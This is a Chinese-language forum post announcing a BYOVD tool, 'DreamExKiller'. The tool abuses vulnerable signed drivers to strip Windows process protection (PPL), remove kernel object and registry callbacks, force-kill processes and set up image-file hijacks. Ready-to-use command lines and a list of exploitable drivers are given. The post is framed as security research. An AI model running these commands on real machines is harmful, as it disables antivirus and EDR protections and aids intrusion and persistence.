基于KDU思路，BYOVD 攻击 Windows 内核回调、进程保护

GitHub: GitHub DreamExKiller

核心功能：

·移除指定进程的 PPL 保护

·移除 ObCallback（可用 PROCESS_ALL_ACCESS 打开任意进程）

·移除 CmCallback（可编辑任何注册表项）

·映像劫持（-hi ExePath DebuggerPath）

·支持 20+ 易受攻击驱动（默认 MSI winio）

使用示例：

DEK -ps 1234               # 移除 PPL

DEK -prv 1 -ps 1234        # 指定 provider

DEK -ob                    # 移除所有 ObCallback

DEK -cm                    # 移除所有 CmCallback

DEK -kill 1234             # 强制终止进程

DEK -hi notepad.exe cmd.exe  # 劫持 notepad 到 cmd

 支持 Provider（部分）

MSI RTCore64、Realtek RtkIo64、ASUS AsIO2/3、Lenovo LDD、AMD PdFwKrnl、Intel PmxDrv 等（详见 README）

 免责声明

仅用于安全研究与教育目的

可能引起 BSOD，强烈建议在虚拟机测试

与反作弊/杀软的不兼容问题将不予处理

[培训]《冰与火的战歌：Windows内核攻防实战》！从零到实战，融合AI与Windows内核攻防全技术栈，打造具备自动化能力的内核开发高手。